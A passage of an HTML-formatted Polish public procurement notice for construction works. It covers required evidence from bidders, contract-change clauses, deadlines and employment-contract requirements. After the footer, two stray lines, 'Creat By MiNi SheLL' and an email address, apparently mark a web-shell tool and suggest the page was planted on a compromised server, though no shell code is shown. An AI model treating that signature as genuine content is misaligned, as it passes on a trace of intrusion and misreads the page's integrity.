terminie,<br/>niekrótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych<br/>środkówdowodowych:1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o<br/>brakuprzynależności do tej samej grupy kapitałowej z innym Wykonawcą, który złożył odrębną ofertę,<br/>ofertęczęściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dowodamipotwierdzającymi, że przygotowanie oferty, oferty częściowej nastąpiło niezależnie od<br/>Wykonawcynależącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ. Oświadczenie musi<br/>być złożone w formie elektronicznej (kwalifikowany podpis elektroniczny) lub w postaci elektronicznej<br/>opatrzonejpodpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania<br/>wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla<br/>formy organizacyjnej lub innym dokumencie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia podmiotowych środków dowodowych:<br/>2) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączonych<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty (spełnianie warunków udziału w<br/>postępowaniu)<br/>3) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia<br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, w zakresie<br/>wymaganym w SWZ (spełnianie warunków udziału w postępowaniu)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy, 2. Pełnomocnictwo (jeżeli dotyczy); 3. Oświadczenie wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy); 4. Zobowiązanie podmiotu<br/>trzeciego lub inny dokument dot. udostępnienia zasobów (jeżeli dotyczy) ; 5. Wykaz rozwiązań<br/>równoważnych (jeżeli dotyczy); 6. Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do<br/>reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć<br/>do oferty. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności<br/>wskazanie:- postępowania o zamówienie publiczne, którego dotyczy, - wszystkich wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby,- ustanowionego pełnomocnika oraz zakresu jego umocowania. Wymagana<br/>forma: Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym, lub<br/>podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu<br/>poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym<br/>podpisem elektronicznym osoby posiadającej uprawnienia notariusza. Zgodnie z art. 97 § 2<br/>ustawy<br/>z 14lutego 1991 r. – Prawo o notariacie, elektroniczne poświadczenie zgodności odpisu, wyciągu<br/>lub kopii z okazanym dokumentem notariusz opatruje kwalifikowanym podpisem elektronicznym. Szczegóły w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Projektowane postanowienia umowy stanowią załącznik nr 2 do SWZ.<br/>3) Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy, zgodnie<br/>z zapisami projektowanych postanowień umowy – zał. nr 2 do SWZ, w szczególności zapisy §<br/>22.<br/>§ 23. Zmiany umowy<br/>1. Dopuszcza się zmiany umowy w zakresie i na warunkach wskazanych w obowiązujących<br/>przepisach prawa, ze szczególnym uwzględnieniem zapisów niniejszego paragrafu.<br/>2. Zmiana harmonogramu rzeczowego oraz terminu wykonania umowy możliwa jest na wniosek<br/>Wykonawcy lub Zamawiającego w następujących przypadkach:<br/>1) opóźnienia związanego z przekazaniem terenu budowy lub dokonaniem odbioru końcowego<br/>robót spowodowanego przez Zamawiającego, nie dłużej jednak niż o czas trwania tego<br/>opóźnienia,<br/>2) jakichkolwiek opóźnień, utrudnień lub przeszkód spowodowanych przez osoby<br/>i podmioty trzecie, jeżeli te opóźnienia nie są wynikiem działania lub zaniechania Wykonawcy, o<br/>czas trwania tych opóźnień, utrudnień lub przeszkód,<br/>3) jeżeli wystąpiła konieczność przeprowadzenia robót zamiennych, wpływających na<br/>dotrzymanie pierwotnego terminu realizacji umowy, szczególnie w następstwie okoliczności,<br/>których w normalnych warunkach Zamawiający nie mógł przewidzieć,<br/>o czas trwania robót zamiennych,<br/>4) w przypadku wstrzymania robót przez Zamawiającego, dopuszcza się zmianę terminu<br/>realizacji przedmiotu umowy o okres, na jaki roboty zostały wstrzymane,<br/>5) wystąpienia siły wyższej, uniemożliwiającej wykonanie przedmiotu umowy zgodnie<br/>z terminem określonym w umowie - dopuszcza się zmianę terminu końcowego realizacji, nie<br/>dłużej jednak niż o czas trwania tych okoliczności,<br/>Powyższe nie wyklucza dokonania zmian umowy w przypadkach określonych<br/>w obowiązujących przepisach, w szczególności w art. 455 ustawy – Pzp.<br/>uwagi na brak miejsca - ograniczona ilość znaków (liter) -<br/>szczegółowe informacje zawarto w SWZ. Prosimy o zapoznanie się z treścią: https://szkola-zs3-<br/>bip2.alfatv.pl/zamowienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-12 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-12 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający na podstawie art. 95 uPzp ustanawia wymóg w zakresie zatrudnienia przez<br/>wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności<br/>w zakresie realizacji zamówienia.<br/>Wykonawca lub podwykonawca winien do realizacji umowy skierować zatrudnione w wymiarze<br/>pełnego etatu na podstawie umowy o pracę osoby, które będą wykonywać pracę w sposób<br/>kreślony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy w zakresie czynności:<br/>prace fizyczne. Prace fizyczne to prace wykonywane bez użycia pojazdów i urządzeń, zostały<br/>opisane<br/>w STWiORB oraz przedmiarach (na przykład: ręczne wykonywanie, ręczne zakopywanie, roboty<br/>ręczne, ręczne rozbicie, kopanie ręczne) Zamawiający nie wymaga zatrudnienia na umowę o<br/>pracę osób wykonujących czynności, do których wykonania niezbędne jest posiadanie<br/>specjalistycznych uprawnień, a których zatrudnienia na umowę o pracę nie wymagają przepisy<br/>Kodeksu pracy (na przykład: kierownik budowy, kierownik robót, operator). Wykonawca lub<br/>podwykonawca, najpóźniej w dniu podpisania umowy w niniejszym przedmiocie, winien złożyć<br/>stosownej treści oświadczenie.<br/>Zamawiający zastrzega prawo do weryfikacji sposobu zatrudnienia ww. osób poprzez wezwanie<br/>Wykonawcy lub podwykonawcy do złożenia odpowiednio oświadczenia oraz poprzez bezpośrednie rozmowy z osobami wykonującymi ww. czynności. W przypadku wykonywania<br/>ww. czynności przez osoby niezatrudnione zgodnie z art. 22 § 1 KP Zamawiający nałoży kary<br/>umowne<br/>w wysokości 5000 zł za każdy ujawniony przypadek. W przypadku stwierdzenia, pomimo<br/>wezwania, że osoby wykonujące ww. czynność i nie są zatrudnione zgodnie z SWZ,<br/>Zamawiający zastrzega możliwość natychmiastowego rozwiązania umowy z winy wykonawcy.<br/>Szczegółowe zapisy zawarto<br/>w projekcie umowy – Zał. nr 2 do SWZ. W zakresie nieuregulowanym w SWZ zastosowanie<br/>znajdują przepisy ustawy Pzp.<br/>We wszystkich przypadkach wskazanych w całej SWZ i załącznikach do SWZ, w których ze<br/>względu na specyfikację przedmiotu zamówienia wskazano pochodzenie, nazwy materiałów,<br/>urządzeń, produktów, systemy, itp. lub ich pochodzenie, dopuszcza się stosowanie rozwiązań<br/>równoważnych, tj. wszelkie wymienione z nazwy materiały, urządzenia, produkty, systemy, itp.<br/>użyte w przekazanej przez Zamawiającego dokumentacji lub ich pochodzenie, służą wyłącznie<br/>określeniu standardu i mogą być zastąpione innymi, o nie gorszych parametrach technicznych,<br/>użytkowych, jakościowych, funkcjonalnych przy uwzględnieniu prawidłowej współpracy z<br/>pozostałymi materiałami, urządzeniami, systemami, produktami, itp. wskazanymi w OZP.<br/>Pojęcie równoważności znajduje również zastosowanie w przypadku, gdy Zamawiający opisał<br/>przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów<br/>odniesienia, czy do konkretnych certyfikatów. Przedstawienie certyfikatów równoważnych<br/>wymaga udowodnienia w ofercie spełniania wymogów wskazanych norm przez rozwiązania<br/>równoważne. Użyte w dokumentacji nazwy, które wskazują lub mogłyby kojarzyć się z<br/>producentem lub firmą, nie mają na celu preferowania rozwiązań danego producenta lecz<br/>wskazanie na rozwiązanie, które powinno posiadać cechy techniczne, technologiczne,<br/>jakościowe nie gorsze od podanych w OPZ. Z uwagi na brak miejsca - ograniczona ilość znaków<br/>(liter) -<br/>szczegółowe informacje zawarto w SWZ. Prosimy o zapoznanie się z treścią: https://szkola-zs3-bip2.alfatv.pl/zamowienia</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com